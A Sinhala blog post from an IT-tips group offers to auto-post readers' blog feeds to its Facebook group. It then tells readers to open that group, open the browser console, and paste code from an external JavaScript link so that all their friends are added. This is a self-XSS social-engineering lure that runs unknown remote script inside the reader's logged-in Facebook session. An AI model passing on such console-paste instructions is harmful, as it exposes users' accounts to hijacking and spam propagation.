WHAT'S NEW?
Loading...

සහෝදර බ්ලොග් කරන්නන් සදහා

 http://www.inkthemes.com/wp-content/uploads/2012/02/wb1.jpg
සහෝදර බ්ලොග් කරන්නන් සදහා IT දැනුම බෙදාගමු පොඩි අවස්ථාවක් දෙන්න හිතුව. දැන් Facebook එකේ ගොඩක් Group වල අපිට post දාන්න බෑනෙ ඒකට admin ගෙ අවසරේ ඕනෙනේ. ඉතින් අපේ Group එක එහෙම නෑ. ඔයාලගෙ blog post එසැනින් අපේ Facebook group එකේ පල කරවීමට අපි අවස්ථාවක් දෙනව. ඔයාලගෙ Blog එකේ Feed Url එකයි නමයි අපිට එවන්න. එච්චරයි කරන්න තියෙන්නෙ. Blog එකේ post එකක් දාපු ගමන් ඒක අපේ Facebook group එකේ පලවෙයි.

 ඔබගේ බ්ලොග් අඩවියේ feed url එකයි නමයි පහත ලිපිනයට එවන්න.
itdanumabedagamu@gmail.com

අපේ group එකනම් තාම එච්චර ලොකු නෑ. ඒත් ඔයාල අපිට උදව් කරයි කියල හිතනව.

අපගේ Facebook Group එකට ඔබෙගෙන් උපකාරයක් අවශ්‍යයි. මුලින්ම අපගේ Facebook Group එකට යන්න. https://www.facebook.com/groups/ITdanuma/

ඊට පස්සෙ පොඩි දෙයයි කරන්න තියෙන්නෙ

Chrome වලින් FB එන අය :-
  1. F12 ඔබන්න
  2. පොඩි BOX එකක් මතුවෙයි එකෙ console යන්න
  3. පහල link එකෙ දාලා තියෙන code එක copy කරලා paste කරන්න
  4. ඉලගට enter key එක ඔබන්න

FireFox වලින් එන අය :-
  1. (Ctrl +Shift+k ) keys 3නම එකවර ඔබන්න
  2. පොඩි BOX එකක් මතුවෙයි එකෙ console යන්න
  3. පහල link එකෙ දාලා තියෙන code එක copy කරලා paste කරන්න
  4. ඉලගට enter key එක ඔබන්න

http://yourjavascript.com/13221370984/newscript.js

යාළුවන් හැම කෙනෙක්ම add උනාට පස්සෙ refresh කරන්න



"හැම දෙනාම හැමදේම නොදන්නේය...."
------------------------------------------------------

▬▬▬▬ Facebook Group ▬▬▬
https://www.facebook.com/groups/ITdanuma/
-------------------------------------------------
 
▬▬▬▬ O F F I C I A L - P A G E ▬▬▬
https://www.facebook.com/Itdanuma
-------------------------------------------------

▬▬▬▬ O F F I C I A L - S I T E ▬▬▬▬
http://www.itdanumabedagamu.blogspot.com/
----------------------------------------------------

▬▬▬▬ E - M a i l ▬▬▬▬
itdanumabedagamu@gmail.com
-------------------------------------

▬ ADMIN @ IT දනුම බෙදාගමු▬


1 comment: Leave Your Comments